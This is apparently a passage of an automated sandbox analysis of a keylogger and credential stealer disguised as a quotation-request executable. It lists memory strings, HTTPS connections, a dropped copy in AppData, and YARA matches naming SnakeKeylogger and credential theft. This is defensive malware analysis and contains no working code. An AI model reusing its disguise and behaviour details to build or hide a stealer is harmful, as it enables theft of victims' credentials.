                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029DA000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003079000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                      Source: nDEusQ.exe, 0000000E.00000002.2800848818.00000000031BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49750 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 9.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: initial sampleStatic PE information: Filename: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 1_2_00FBDA5C1_2_00FBDA5C
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1A0889_2_00C1A088
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1C19B9_2_00C1C19B
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1D2789_2_00C1D278
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C153709_2_00C15370
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1C4689_2_00C1C468
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1C7389_2_00C1C738
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C129E09_2_00C129E0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1E9889_2_00C1E988
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C169A09_2_00C169A0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1CA089_2_00C1CA08
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1CCD89_2_00C1CCD8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C13E099_2_00C13E09
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C16FC89_2_00C16FC8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1CFAB9_2_00C1CFAB
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1F9619_2_00C1F961
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_00C1E97B9_2_00C1E97B
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CE7D09_2_065CE7D0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C1FA89_2_065C1FA8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C94489_2_065C9448
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C9D389_2_065C9D38
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C2A909_2_065C2A90
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C18509_2_065C1850
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C51489_2_065C5148
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CD6709_2_065CD670
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C96689_2_065C9668
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CD6609_2_065CD660
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CDF1F9_2_065CDF1F
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CDF209_2_065CDF20
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CE7CF9_2_065CE7CF
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C1F9C9_2_065C1F9C
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CEC189_2_065CEC18
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CEC289_2_065CEC28
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CF4D89_2_065CF4D8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C8CC09_2_065C8CC0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CCDC09_2_065CCDC0
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CD2189_2_065CD218
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CDAC89_2_065CDAC8
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CE3789_2_065CE378
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CE36A9_2_065CE36A
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C0B309_2_065C0B30
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C0B209_2_065C0B20
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C00409_2_065C0040
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C18419_2_065C1841
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CF0719_2_065CF071
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C00069_2_065C0006
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CF0809_2_065CF080
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065C51389_2_065C5138
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CF9309_2_065CF930
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeCode function: 9_2_065CF9229_2_065CF922
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0153DA5C10_2_0153DA5C
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_031E013010_2_031E0130
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_031E012010_2_031E0120
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_031EF59810_2_031EF598
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_031EF58710_2_031EF587
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569E67810_2_0569E678
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569C69210_2_0569C692
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569056010_2_05690560
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569055010_2_05690550
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_056997E810_2_056997E8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569912810_2_05699128
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569911710_2_05699117
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569407810_2_05694078
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569026910_2_05690269
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569027810_2_05690278
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_05696FF810_2_05696FF8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_0569880010_2_05698800
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 10_2_05696BC010_2_05696BC0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544C46814_2_0544C468
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544C73814_2_0544C738
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544C14614_2_0544C146
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544711814_2_05447118
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544A08814_2_0544A088
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544537014_2_05445370
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544D27814_2_0544D278
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544CCD814_2_0544CCD8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544CFA914_2_0544CFA9
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544E98814_2_0544E988
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_054469A014_2_054469A0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544CA0814_2_0544CA08
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_05443E0914_2_05443E09
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544F96114_2_0544F961
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_0544E97A14_2_0544E97A
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_054429EC14_2_054429EC
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_05443A3914_2_05443A39
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC2A9014_2_06DC2A90
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC966814_2_06DC9668
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC1FA814_2_06DC1FA8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCF4D814_2_06DCF4D8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC185014_2_06DC1850
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC9D9014_2_06DC9D90
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC514814_2_06DC5148
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCDAC814_2_06DCDAC8
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCDAB914_2_06DCDAB9
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCD67014_2_06DCD670
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCD66014_2_06DCD660
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCD21814_2_06DCD218
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCE7D014_2_06DCE7D0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCE7CF14_2_06DCE7CF
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC1FA114_2_06DC1FA1
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCE37814_2_06DCE378
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCE36914_2_06DCE369
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCDF1F14_2_06DCDF1F
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC0B3014_2_06DC0B30
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCDF2014_2_06DCDF20
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC0B2014_2_06DC0B20
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC8CC014_2_06DC8CC0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCF08014_2_06DCF080
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC8CB114_2_06DC8CB1
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC944814_2_06DC9448
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC004014_2_06DC0040
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC184114_2_06DC1841
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCF07114_2_06DCF071
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCEC1814_2_06DCEC18
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC000714_2_06DC0007
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCEC2814_2_06DCEC28
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCCDC014_2_06DCCDC0
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC514314_2_06DC5143
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCF93014_2_06DCF930
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DC9D2914_2_06DC9D29
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeCode function: 14_2_06DCF92114_2_06DCF921
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: invalid certificate
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1606022545.0000000005AC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000000.1556844407.000000000071A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejkcw.exeH vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1607054546.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1605891572.00000000054C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.000000000435F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1599728924.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1601618602.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2798598293.00000000007A7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeBinary or memory string: OriginalFilenamejkcw.exeH vs INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
